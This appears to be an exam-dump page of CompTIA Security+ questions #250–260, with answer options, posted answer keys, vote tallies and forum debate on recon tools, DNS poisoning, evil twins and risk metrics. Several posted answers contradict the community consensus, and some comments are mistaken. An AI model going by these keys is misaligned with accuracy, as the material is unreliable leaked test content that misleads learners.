https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 427/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Only "B. Fence with electricity" can be harmful for individuals, so i think it is the best option here.
upvoted 3 times

  andrizo 3 months, 3 weeks ago


Does not detect
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 428/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #250 Topic 1

An IT security manager requests a report on company information that is publicly available. The manager's concern is that malicious actors will be
able to access the data without engaging in active reconnaissance. Which of the following is the MOST efficient approach to perform the analysis?

A. Provide a domain parameter to theHarvester tool.

B. Check public DNS entries using dnsenum.

C. Perform a Nessus vulnerability scan targeting a public company’s IP.

D. Execute nmap using the options: scan all ports and sneaky mode.

Correct Answer: B

Community vote distribution


A (96%) 4%

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: A
https://www.kali.org/tools/theharvester/
upvoted 11 times

  [Removed] Highly Voted  3 months, 4 weeks ago


Selected Answer: A
theharvester
The package contains a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from
different public sources (search engines, pgp key servers). kashim
upvoted 8 times

  nicekoda Most Recent  1 month, 1 week ago


A and B are used for passive information gathering, but theHarvester tool is used for searching emails. The correct answer is B. Others are for
active information gathering
upvoted 1 times

  Sandon 1 week, 2 days ago


No sir, that ain't it.
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


I would like to vote for A, but my thinking is… Is this the most practical solution? Harvester tool = Python… I guess Im trying to compare A and
B.. Eventhough both answers make sense in a way.. Im trying to figure what could be the best solution from the practicality and basic
perspectives from Cyber Security…
upvoted 1 times

  mmains 2 months, 1 week ago


Selected Answer: A
theharvester
The package contains a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/ banners, and employee names from
different public sources (search engines, pgp key servers).
upvoted 1 times

  Blueteam 2 months, 1 week ago


The answer is A.
The question is about active and non active recon. Only option A fits.
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: A
A should be the right answer here
upvoted 1 times

  Ty92503 3 months ago


Selected Answer: B
DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield
usernames, computer names, and IP addresses of potential target systems.
upvoted 1 times

  Sandon 1 week, 2 days ago


Try again

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 429/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times

  Samsonite363 1 week ago


Do you have anything to add to people's comments besides 2 or 3 word responses saying they're wrong? Add some insight or
explanations behind your accusations if you think the answer they suggest is incorrect
upvoted 3 times

  J_Ark1 3 months ago


Selected Answer: A
I saw the word "Parameter" and went for A because it sugested that the gathered data would be protected from a malicious actor.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 430/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #251 Topic 1

Which of the following environments utilizes dummy data and is MOST likely to be installed locally on a system that allows code to be assessed
directly and modified easily with each build?

A. Production

B. Test

C. Staging

D. Development

Correct Answer: B

Community vote distribution


D (68%) B (27%) 5%

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: D
Correction (D). Development.
upvoted 6 times

  asum Most Recent  2 weeks, 4 days ago


Selected Answer: C
Development—the code will be hosted on a secure server. Each developer will check
out a portion of code for editing on his or her local machine. The local machine will
normally be configured with a sandbox for local testing. This ensures that whatever
other processes are being run locally do not interfere with or compromise the
application being developed.
• Test/integration—in this environment, code from multiple developers is merged
to a single master copy and subjected to basic unit and functional tests (either
automated or by human testers). These tests aim to ensure that the code builds
correctly and fulfills the functions required by the design.
• Staging—this is a mirror of the production environment but may use test or sample
data and will have additional access controls so that it is only accessible to test
users. Testing at this stage will focus more on usability and performance.
upvoted 1 times

  Sandon 1 week, 2 days ago


No sir
upvoted 1 times

  alwaysrollin247 1 month, 1 week ago


Selected Answer: B
Development -Software developers use a development environment to create the application. This typically includes version control and change
management controls to track the application development.

Test - Testers put the application through its paces and attempt to discover any bugs or errors. The testing environment typically doesn’t simulate
a full production environment, but instead includes enough hardware and software to test software modules.

Staging - The staging environment simulates the production environment and is used for late stage testing. It provides a complete but
independent copy of the production environment.

The production environment is the final product. It includes everything needed to support the application and allow customers and others to use
it. In this example, it would include the live web server, possibly a back-end database server, and Internet access.
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The correct answer is D. Development.

Development environments are typically used for building and testing software applications. They often use dummy or sample data, and are
usually installed locally on a system where code can be easily accessed and modified during the development process. This allows developers to
test and debug their code without affecting the production environment.

Production environments, on the other hand, are the live environments where software applications are deployed and used by end-users. They
typically use real data and are not intended for testing or development purposes.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 431/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Test and staging environments are also used for testing and debugging, but they are typically more similar to production environments in terms of
the data and configurations they use. These environments are often used to perform final testing before deploying an application to the
production environment.
upvoted 1 times
  carpathia 2 months, 1 week ago
Selected Answer: D
pg 252. D Gibson.
upvoted 1 times

  Blueteam 1 month, 4 weeks ago


https://analystanswers.com/dummy-data-definition-example-how-to-generate-it/
Dummy data is mock data generated at random as a substitute for live data in testing environments.
upvoted 1 times

  Blueteam 2 months, 1 week ago


Correct answer is B. Testing environment.
Dummy data is mock data generated at random as a substitute for live data in testing environments. Dummy Data is used for testing new
programs and testing modifications on existing program.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: D
Apparently:

https://michaelstivala.com/why-dummy-data-matters-and-how-to-generate-it/

Google for environment dummy data


upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
I´ll go with development. Testing will already be used to test integration with other services and stuff...as long as you are playing around, you´ll do
that in development and that´s most often done locally
upvoted 1 times

  ksave 2 months, 3 weeks ago


Selected Answer: B
Since the question does not mention automation (CI/CD) way of working, I believe it is testing
upvoted 1 times

  Knowledge33 2 months, 4 weeks ago


Selected Answer: D
Development -> Testing -> Staging -> Production
upvoted 1 times

  ostralo 3 months, 2 weeks ago


The elements of a test environment include the following:

The software to be tested


Test data
Network configuration
Device on which the software is to be tested
Database server
upvoted 1 times

  ostralo 3 months, 2 weeks ago


If there is a test failure, the faulty code can be removed in this environment. Thus, testers can ensure the quality of the code by finding any
bugs and reviewing all bug fixes. However, if all tests pass, the test environment can automatically move the code to the next deployment
environment.
upvoted 1 times

  PCTAN 3 months, 2 weeks ago


Selected Answer: B
I believe it is B since you don't update code in TEST environment. TEST environment is meant for testing only.
upvoted 2 times

  03allen 3 months, 1 week ago


so, what do you call if you fix bugs during the TEST stage? Development again?
upvoted 1 times

  PCTAN 3 months, 2 weeks ago


Sorry, I meant answer is D
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 432/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  passmemo 3 months, 3 weeks ago


Selected Answer: D
Development
You can easily make changes
upvoted 4 times

  Granddude 3 months, 3 weeks ago


Selected Answer: B
The old dump conversations show B to be the answer by the majority.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 433/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #252 Topic 1

An analyst receives multiple alerts for beaconing activity for a host on the network. After analyzing the activity, the analyst observes the following
activity:

* A user enters comptia.org into a web browser.


* The website that appears is not the comptia.org site.
* The website is a malicious site from the attacker.
* Users in a different office are not having this issue.

Which of the following types of attacks was observed?

A. On-path attack

B. DNS poisoning

C. Locator (URL) redirection

D. Domain hijacking

Correct Answer: C

Community vote distribution


B (65%) C (35%)

  Ha9ate Highly Voted  3 months, 4 weeks ago


Selected Answer: B
Only some client have this problem about web tarns to malicious site.
So choose B.
upvoted 10 times

  Action Most Recent  9 hours, 27 minutes ago


Selected Answer: C
It’s not affecting other users so it’s C. Wouldn’t DNS poisoning affect other users ?
upvoted 1 times

  mike47 5 days ago


Selected Answer: B
This is the reason why the answer is 100% B :
A. On Path Attack - sits in the middle of two stations changing data that comes across the path. - This is not the answer.
B. DNS Poisining - Hacker reroutes traffic from legitimate site to fake version. This is what happened here. When user when to CompTIA.org, he
went to fake version because legitimate DNS address/records/info for that site was changed at his site specifically. - This is the correct answer.
C. Locator (URL) redirection - clicks on link and is redirected to malicious website. A URL was not clicked on in this question. A domain was
typed in: Comptia.org. And also redirection was not described in this question. This is not the answer.
D. Domain Higjacking - Website address is completely stolen by another party. The question clearly states that "users from a different office are
not having this problem". If the users were having the problem, then this would mean that that the website was stolen. But because other users
at other locations are not having the problem: This is not the answer.

B. DNS Poisoning is the Only Correct Answer 100%


upvoted 1 times

  Sandon 1 week, 2 days ago


According to ChatGPT

B. DNS poisoning

DNS poisoning, also known as DNS spoofing or DNS cache poisoning, is a type of attack in which an attacker alters the mapping of a domain
name to an IP address. In this case, the analyst observed that a user enters comptia.org into a web browser, but the website that appears is not
the actual comptia.org site. Instead, it's a malicious site controlled by the attacker. This behavior indicates that the attacker has poisoned the
DNS server, causing the server to return the wrong IP address for the domain name comptia.org. This attack is also known as DNS Cache
Poisoning.

An on-path attack is an attack that intercepts and alters network traffic in transit.
Locator (URL) redirection is a technique used to redirect a web page request to a different web page.
Domain hijacking is an attack in which an attacker gains unauthorized access to a domain name registrar account, allowing them to change the
DNS records and take control of a domain name.
upvoted 1 times

  Ranaer 2 weeks, 2 days ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 434/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
Everyone saying that other dont have the same issue, thus it cant be DNS poisoning dont seem to realize that local network also have DNS
cache, which can be poisoned. You dont query every single time someone puts in a link into their browser, its so much pointless traffic, when one
user goes to facebook, the local DNS cache has that information for the next 24 hours, if another user goes to the same site, they get the IP from
the local DNS cache. People in the other office, that might be 1-3-5-100-1000km's away, do NOT use the same local DNS cache, since its
unlikely they are on the same network.
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: C
Other user are not having the same issue…
upvoted 2 times

  Juraj22 2 months ago


Selected Answer: C
Yes, but it should be C, because another users dont have this problems. If problems are on DNS server, that other users should have problems
too...this information is probably most important for our choice. I am OK with C.
upvoted 4 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: B
B is most likely the case here. with a URL redirection attack the attacker would give a user a malicious link or something which redirects the user
once clicked...but in this case it reads mor like a DNS Poisoning attack to me performed on the host (maybe by using the hosts file)
upvoted 2 times

  Knowledge33 2 months, 4 weeks ago


Selected Answer: B
The response is B, not D.
DNS Poisoning --> WHen the user request a DNS resolution, a milicious replies, and not the legitimate DNS server.
Domain Hijacking --> An attacker has configured a bad entry in the DNS server (malicious IP). Then, all hierarchical DNS server have this bad
entry which redirect all users (worldwido) to the malicious website.
upvoted 1 times

  G4ct756 3 months, 1 week ago


Selected Answer: B
Definitely B, because user type out site address correctly but gets directed to a malicious site.
> likely the DNS record is poisoned.
not A, MITM attacker usually intercept user visiting legit website.
not C, as user type site address correctly instead of clicking a malicious link.
not D, attacker would have taken over a legit site.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: B
After some research, its B.

It's B and not D because the user is actually typing the url into the browser. That's a DNS change on their machine specifically.

URL redirection is normally done through phishing and those means to mimic a legitimate site. Not from the user typing in the URL. That's the
key part of the question.
upvoted 3 times

  ostralo 3 months, 2 weeks ago


Selected Answer: B
DNS 100%
upvoted 1 times

  ergo54 3 months, 3 weeks ago


Selected Answer: C
"The indicator of a successful URL redirection attack is simple. You attempt to go to a website, and you're redirected to another website." -Darril
Gibson
upvoted 3 times

  Granddude 3 months, 3 weeks ago


Selected Answer: C
https://www.virtuesecurity.com/kb/url-redirection-attack-and-
defense/#:~:text=URL%20Redirection%20is%20a%20vulnerability,redirected%20to%20the%20malicious%20website.

URL Redirection is a vulnerability which allows an attacker to force users of your application to an untrusted external site. The attack is most
often performed by delivering a link to the victim, who then clicks the link and is unknowingly redirected to the malicious website.
upvoted 3 times

  andrizo 3 months, 3 weeks ago


Does not affect other computers
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 435/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  Skelter117 3 months, 3 weeks ago
I could be wrong but I believe if you were redirected the url would change to whatever that site was called and not still be called the original
website you typed in. Thoughts?
upvoted 1 times

  ksave 3 months, 3 weeks ago


Selected Answer: B
DNS cache has been poisoned.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 436/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #253 Topic 1

Which of the following in the incident response process is the BEST approach to improve the speed of the identification phase?

A. Activate verbose logging in all critical assets.

B. Tune monitoring in order to reduce false positive rates.

C. Redirect all events to multiple syslog servers.

D. Increase the number of sensors present on the environment.

Correct Answer: B

Community vote distribution


B (53%) A (24%) D (24%)

  Sir_Learnalot Highly Voted  2 months, 3 weeks ago


Selected Answer: B
In the incident response process the identification phase is used to recognize whether an event that occurs should be classified as an incident.
Therefor false positive tuning would increase the identification time, as A and D would give you more insides, but also more FP and there fore it
makes it harder to identify real incidents...I´ll go with "B"
upvoted 6 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: B
B. Tune monitoring in order to reduce false positive rates.

Improving the speed of the identification phase in incident response process involves reducing the amount of data that has to be analyzed to find
the incident. Tuning monitoring to reduce false positive rates helps to achieve this goal by reducing the amount of noise in the logs and alerts that
have to be analyzed. This means that only the most relevant data is being evaluated, which can significantly reduce the time it takes to identify an
incident and move to the next phase of the incident response process. By tuning the monitoring to reduce false positive rates, the systems
administrator can focus on only the most important data, which can help to speed up the identification phase and improve overall incident
response time.
upvoted 1 times

  Bogardinc 5 days, 8 hours ago


I believe some of you guys have dedicated your lives to input wrong answers to throw everyone off. If you don't have a reference please knock it
off.
upvoted 1 times

  omen679 2 days, 9 hours ago


What is the correct answer?
upvoted 1 times

  G4ct756 3 months, 1 week ago


Selected Answer: B
B, getting accurate report will allow analyst to pinpoint the problem fast.
not A, cause there is no point focusing on Critical Asset when point of entry is likely some host.
not C, cause having your logs distributed makes it harder to aggregate.
not d, more sensor will produce more log for analyst to sift through.
upvoted 2 times

  ostralo 3 months, 2 weeks ago


Selected Answer: A
FP alerts cost too much time..
upvoted 1 times

  ostralo 3 months, 2 weeks ago


Oh no... I meant to choose B
upvoted 1 times

  ostralo 3 months, 2 weeks ago


A,D will worsen the speed of the identification phase
upvoted 1 times

  nk020 3 months, 2 weeks ago


Selected Answer: A
should be A
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 437/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  jspecht 3 months, 2 weeks ago


Selected Answer: A
Verbose logging will give you a better idea of exactly what is going on in your environment.
upvoted 2 times

  yasuke 3 months, 1 week ago


verbose logging can also give false +ves if not tuned well
upvoted 1 times

  Granddude 3 months, 3 weeks ago


Selected Answer: D
After reading this article, I believe detection is the key.
https://www.sciencedirect.com/topics/computer-science/incident-response-process
upvoted 4 times

  Papee 3 months, 3 weeks ago


Read the article nothing about increasing sensor on environment was mentioned for Identification Phase. Any better explanation?
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 438/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #254 Topic 1

A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While
using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with
the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

A. On-path

B. Evil twin

C. Jamming

D. Rogue access point

E. Disassociation

Correct Answer: B

Community vote distribution


B (100%)

  carpathia 2 months, 3 weeks ago


Selected Answer: B
Same ESSID (SSID) and BSSID (MAC address) = evil twin
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Evil Twin

Evil twin attacks are a type of Man in the Middle (MitM) attack in which a fake Wi-Fi network is set up to steal information or further infiltrate a
connecting device. This is often done in public settings where people are most likely to look for or connect to freely available Wi-Fi.

The evil twins here is the access points with the same SSID as the legitimate access points.
upvoted 1 times

  Tomtom11 3 months ago


Selected Answer: B
https://www.professormesser.com/security-plus/sy0-501/rogue-access-points/
upvoted 1 times

  passmemo 3 months, 3 weeks ago


Selected Answer: B
B is the answer
upvoted 2 times

  Kashim 3 months, 3 weeks ago


Selected Answer: B
B Correct

https://security.stackexchange.com/questions/152816/whats-the-difference-between-an-evil-twin-and-a-rogue-access-point
upvoted 4 times

  Skelter721 3 months, 4 weeks ago


Shouldn’t this be D?
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


Its B as the ssid details are the same
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 439/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #255 Topic 1

When implementing automation with IoT devices, which of the following should be considered FIRST to keep the network secure?

A. Z-Wave compatibility

B. Network range

C. Zigbee configuration

D. Communication protocols

Correct Answer: D

Community vote distribution


D (53%) C (47%)

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: D
I guess communication protocols is the best option here.
upvoted 10 times

  blacktaliban Highly Voted  2 months, 2 weeks ago


Selected Answer: C
Going with C.

Got my test today 11.19.22 :)


upvoted 5 times

  itsmorphintime 2 months, 1 week ago


did you find the questions from examtopics relevant to the actual test ?
upvoted 1 times

  ZDW Most Recent  4 days, 13 hours ago


Selected Answer: D
This Should be D, while Zigbee is a Communications Protocol it is not the only option to choose from. Because of this Zigbee is not the only
option that needs to be considered.
upvoted 1 times

  Ranaer 2 weeks, 2 days ago


Selected Answer: C
I dont know if people know that, but some questions have multiple correct answers, which all give points, even if different amount. In this
particular question I believe both C and D are correct. Zigbee IS a communication protocol, which is solely focused on IoT devices, which I
believe is the better answer here. However selecting D would still be considered correct in my opinion, but since it is not directly linked to IoT
devices as Zigbee, it would simply net you less points.
upvoted 1 times

  RvR109 3 weeks, 4 days ago


Selected Answer: D
"Before taking the leap and deploying an IoT solution, it is critical to know the limiting factors of each technology. Communication protocols are
the set of rules established between nodes to exchange information in a reliable and safe manner."

https://www.allaboutcircuits.com/technical-articles/internet-of-communication-communication-protocols-network-protocols/
upvoted 1 times

  mick1 1 month ago


Where did You get info, that all IoT devices are working with Zigbee? There is even no info, it is wireless. For me it is D
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: D
D is the answer..
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
To keep an IoT network secure, the first thing that should be considered is the communication protocols that will be used. This is because the
communication protocols dictate how the devices on the network will communicate with each other, and using secure protocols can help prevent
unauthorized access to the network and the devices on it. Other factors, such as the range and compatibility of the network and the

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 440/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

configuration of the devices, are also important, but they should be considered after the communication protocols have been securely
implemented.
upvoted 2 times
  Blueteam 2 months, 1 week ago
Bad question. However the best answer is C.
The most important factor in IOT security is following secure configuration of devices.
Both Z wave and ZigBee are used for IOT. The most important factor is configuration of them.
upvoted 2 times

  carpathia 2 months, 3 weeks ago


Selected Answer: C
The only weakness re IoT stated in a Comptia book I am studying is weak defaults, so that would point to the Zigbee config aka change the
default password etc whatever is there.
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Zigbee configuration

I don't think this is the first consideration but doesn't matter I guess. Zigbee is a wireless specification to address the needs of low-cost, low-
power wireless IoT data networks.
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
D is the broad answer here, but I think that CompTIA would like to here that you actually know about Zigbee being used with IoT devices, so I´d
go with ZigBee
upvoted 3 times

  Lilibell 3 months ago


I choose C
https://www.develcoproducts.com/gateways/wireless-protocols/zigbee/zigbee-home-automation/
upvoted 1 times

  simsbow1098 3 months, 1 week ago


Selected Answer: C
I will be the odd man out here. Correct me if I am wrong please. If I have learned anything from CompTIA exams they are very particular about
key words or phrases. From the book "Zigabee is a network protocol that is designed for personal area networks like those found in houses for
home automation" Also it is the only one in the exam objectives.
upvoted 4 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: D
A and C are the same thing. So it isn't either one of those. I don't know how the Network Range makes something more secure in this
case...so...I have to go with D.
upvoted 2 times

  NXPERT 3 months, 2 weeks ago


B is the answer, the rest of the three are basically the same Zigbee = Z wave = communication protocols.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 441/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #256 Topic 1

An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would
work BEST to help identify potential vulnerabilities?

A. hping3 -S comptia-org -p 80

B. nc -l -v comptia.org -p 80

C. nmap comptia.org -p 80 -sV

D. nslookup –port=80 comptia.org

Correct Answer: C

Community vote distribution


C (100%)

  Skelter117 Highly Voted  3 months, 3 weeks ago


Selected Answer: C
Nmap -sV flag detects the (s)ervice (V)ersion on what you are scanning Source: personal pentesting experience
upvoted 7 times

  Skelter117 Most Recent  3 months, 3 weeks ago


Nmap -sV flag detects the (s)ervice (V)ersion on what you are scanning
Source: personal pentesting experience
upvoted 2 times

  passmemo 3 months, 3 weeks ago


Selected Answer: C
Nmap on port 80
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 442/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #257 Topic 1

A news article states hackers have been selling access to IoT camera feeds. Which of the following is the MOST likely reason for this issue?

A. Outdated software

B. Weak credentials

C. Lack of encryption

D. Backdoors

Correct Answer: B

Community vote distribution


B (93%) 7%

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: B
Most of the IoT devices have the same password given by the manufacturer. In my opinion B (Weak credentials) is the most common point of
attack.
upvoted 7 times

  shitgod 1 month, 1 week ago


Highly Voted 
The quality of this question is really bad.
upvoted 5 times

  Tomtom11 Most Recent  3 months ago


Selected Answer: B
Weak defaults are a condition where default
conditions are generally known, including admin account and password,
leaving the system completely vulnerable to an attacker.
upvoted 2 times

  560exam 2 months ago


If the credentials are generally known, they would probably be free. The question says "Hackers are selling the creds"
upvoted 1 times

  lordguck 3 months ago


I go for B. IoT are not only cheap china/taiwan products with no support/updates, but also high quality devices e.g. by Axis or Mobobix, who
update their firmware/software to close backdoors/vulnerabilities, if found.
upvoted 1 times

  ostralo 3 months, 2 weeks ago


https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/

default password
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: B
A Outdated software implies someone exploited a vulnerability to gain access vs B People used Weak credentials such as default passwords,
that seems more likely to me.
upvoted 4 times

  ksave 3 months, 3 weeks ago


Selected Answer: A
Outdated software since software updates by vendors are very limited in IoT devices
upvoted 1 times

  [Removed] 3 months, 4 weeks ago


A. Outdated software
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 443/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #258 Topic 1

A company wants to build a new website to sell products online. The website will host a storefront application that will allow visitors to add
products to a shopping cart and pay for the products using a credit card. Which of the following protocols would be the MOST secure to
implement?

A. SSL

B. SFTP

C. SNMP

D. TLS

Correct Answer: D

Community vote distribution


D (92%) 8%

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: D
Transport Layer Security (TLS) is the successor protocol to SSL. TLS is an improved version of SSL. It works in much the same way as the SSL,
using encryption to protect the transfer of data and information. The two terms are often used interchangeably in the industry although SSL is still
widely used.

https://www.websecurity.digicert.com/security-topics/what-is-ssl-tls-
https#:~:text=Transport%20Layer%20Security%20(TLS)%20is,SSL%20is%20still%20widely%20used.
upvoted 7 times

  mike47 Most Recent  4 days, 21 hours ago


Selected Answer: D
SFTP deals with flle transfer and SNMP deals with network devices such as routers & switches.
TLS is the improved version of SSL. TLS has higher and way more reliable security than SSL. Therefore D: TLS is the answer.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The most secure protocol to implement for a website that allows visitors to pay for products using a credit card would be TLS (Transport Layer
Security). This protocol is designed to provide secure communications over a computer network and can be used to protect the transmission of
sensitive information, such as credit card numbers and other personal data. SSL (Secure Sockets Layer) is an older protocol that has largely been
replaced by TLS, so it would not be the best choice for this type of application. SFTP (SSH File Transfer Protocol) is a secure file transfer
protocol, but it is not typically used for transmitting sensitive information like credit card numbers. SNMP (Simple Network Management Protocol)
is a protocol used for managing network devices, but it does not provide the same level of security as TLS.
upvoted 1 times

  Tomtom11 3 months ago


Selected Answer: D
Hypertext Transfer Protocol Secure (HTTPS) is the use of SSL or TLS to
encrypt a channel over which HTTP traffic is transmitted. Because of issues
with all versions of SSL, only TLS is recommended for use.
upvoted 2 times

  comeragh 3 months, 2 weeks ago


Selected Answer: D
D - TLS. Agreed.
upvoted 1 times

  Dachosenone 3 months, 3 weeks ago


Selected Answer: A
SSL is more specific than TLS
upvoted 1 times

  banditring 3 months, 3 weeks ago


well SSL has problems too lol
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


TLS is the new SSL.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 444/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Skelter117 3 months, 3 weeks ago


Well we know TLS is secure but everyone still refers to the TLS as SSL. wonder if that context applies here.
upvoted 2 times

  Granddude 3 months, 3 weeks ago


I am going with TLS as it is the newest and listed as one of the answers.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 445/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #259 Topic 1

An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced
due to loss, damage, or theft steadily increased by 10%. Which of the following would BEST describe the estimated number of devices to be
replaced next year?

A. ALE

B. ARO

C. RPO

D. SLE

Correct Answer: A

Community vote distribution


B (81%) A (19%)

  dansecu Highly Voted  3 months, 4 weeks ago


Selected Answer: B
ARO - annualized rate of occurrence is a representation of the frequency of the event, measured in a standard year. In our case number of the
defecive device per year.
Annual loss expectancy (ALE) is the loss (amount of money) due ARO.
The question is about the number of the device, not about money.
upvoted 19 times

  P0wned Most Recent  2 weeks, 5 days ago


Selected Answer: A
Annual Loss Expectancy (ALE) is a measure of the estimated financial loss that an organization can expect to incur over a given period of time. In
this scenario, the IT manager is trying to estimate the number of devices that will need to be replaced next year due to loss, damage, or theft.
The IT manager is aware that the number of devices that were replaced over the last five years has steadily increased by 10%. To estimate the
number of devices that will need to be replaced next year, the IT manager would use the ALE formula: ALE = SLE x ARO.
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy. Hit the books
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: B
B is the Answer
upvoted 1 times

  EubertT 1 month, 4 weeks ago


Here are two hints of the question: the mobile device budget for the upcoming year = the estimated number of devices to be replaced next year.
For this reason I believe is A.= ALE
upvoted 1 times

  Sandon 1 week, 2 days ago


ALE is the $ amount. Answer is ARO
upvoted 1 times

  Rusher 2 months, 2 weeks ago


Selected Answer: B
I'm going with B
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: B
"number of devices", not $$$.
ARO
upvoted 3 times

  Ashbash95 2 months, 4 weeks ago


Selected Answer: A
Answer is ALE
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 446/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Sir_Learnalot 3 months ago


Selected Answer: B
ARO should be correct. They aske for the expected number of devices, not the costs for them. If they´d ask for the cost it would be ALE as it´s
ALE = ARO*SLE
upvoted 2 times

  studant_devsecops 3 months, 2 weeks ago


Selected Answer: A
ALE - Annual Loss Expectancy. (ALE = SLE(single loss exp.)*ARO(annual rate of occur.))
upvoted 2 times

  ergo54 3 months, 3 weeks ago


Selected Answer: B
Annualized Loss Expectancy (ALE) is the expected monetary loss that can be expected for an asset due to a risk over a one year period. This
question is asking about loss of devices in a year
upvoted 4 times

  passmemo 3 months, 3 weeks ago


Selected Answer: A
An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced
due to loss, damage, or theft steadily increased by 10%. Which of the following would BEST describe the estimated number of devices to be
replaced next year?
upvoted 3 times

  passmemo 3 months, 3 weeks ago


Annual Loss Expectancy (ALE), which is the total loss we can expect from a risk in a one-year timeframe and is calculated by multiplying SLE
by ARO
upvoted 1 times

  [Removed] 3 months, 4 weeks ago


• ALE (Annualized Loss Expectancy)
upvoted 2 times

  kt01 3 months, 4 weeks ago


I agree. It's ALE.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 447/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #260 Topic 1

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

A. Detective

B. Preventive

C. Corrective

D. Compensating

Correct Answer: C

Community vote distribution


C (89%) 11%

